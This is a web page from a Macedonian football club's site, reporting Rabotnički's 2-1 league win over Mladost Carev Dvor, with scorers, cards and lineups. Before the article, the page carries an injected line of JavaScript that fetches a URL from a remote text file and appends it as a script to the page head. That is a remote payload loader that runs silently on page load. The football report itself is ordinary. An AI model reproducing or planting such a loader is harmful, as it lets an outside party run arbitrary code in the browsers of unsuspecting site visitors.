;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Прва пролетна радост: Франц со победа ја почна „романтичната одисеја“
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Прва пролетна радост: Франц со победа ја почна „романтичната одисеја“

Под водство на новиот шеф на стручен штаб, Томислав Франц, нашиот тим со победа од 2-1 (1-0) против Младост Царев Двор го почна пролетниот дел од Првата македонска фудбалска лига.

Во 19. коло од Првата лига, на дуелот кој се одигра на стадионот на тренинг комплексот, „Петар Милошевски“, Работнички сосема заслужено стигна до трите бода.

Избраниците на Томислав Франц одлично ја почнаа средбата, а откако во 19. минута не се реализираше по можноста на Алтипармаковски, следеше удар од белата точка во 23. минута. Суад Сахити, по соло продорот, беше соборен од Конате во гостинскиот шеснаесетник, а сигурен реализатор од белата точка беше Алтипармаковски.

Rabotnicki - Mladost CD 5

Во првото полувреме, убави можности имаа повторно Алтипармаковски и Милован Петровиќ во 36. и во 39. минута, но не ги искористија проигрувањата од Горан Силјановски.

Во второто полувреме, Колумбиецот Херера во 50. минута зголеми на 2-0, а откако Милан Илиевски принудно мораше да ја напушти играта поради повреда, стручниот штаб мораше да менува во одбраната.

Тоа како да го искористија гостите и намалија преку Ардит Шаќири во 74. минута од натпреварот, кој убаво реагираше по корнерот на Хани.

Tomislav Franc

Во 83. минута, Младост Царев двор остана и со играч помалку по исклучувањето на Христијан Гроздановски, поради груб старт врз Алтипармаковски. До крајот составот на Франц имаше уште две шанси за зголемување на предноста, но конечната победа остана заокружена на 2-1.

По овие три бода, Работнички со 27 бода се искачи на третата позиција на табелата, пред Силекс кој има 26 бода, но и натпревар помалку.

ПРВА ЛИГА – 19. КОЛО

РАБОТНИЧКИ – МЛАДОСТ ЦД 2-1 (1-0)

Стадион на комплекс „Петар Милошевски“ на ФФМ. Гледачи: 300. Главен судија: Јосип Бартон. Помошници: Иса Емурли и Небојша Георгиевски. Делегат: Никола Џорлев (Струмица). Стрелци: Алтипармаковски 23 мин.(п), Херера 50 мин.; Ардит Шаќири 74 мин. (Мла.ЦД). Ж. картони: Илиевски, Трајчевски (Раб.); Конате (Мла. ЦД). Црвен картон: Христијан Гроздановски 83 мин. (Мла. ЦД).

РАБОТНИЧКИ: Божиновски, Илиевски (67’ Најдовски), Марковски, Цикарски, Силјановски, Најденов, Херера (77’ Јовановски), Петровиќ, Трајчевски, С. Сахити (90’ Галиќ), Алтипармаковски.

МЛАДОСТ ЦД: Апостоловски, Ѓорески, Симјановски, Грозданоски, Конате, Далчески, Стевановиќ (64’ Хани), Каланоски, Кампос (64’ Салиу), Трпески, Шаќири (85’ Џалески).

Leave a Reply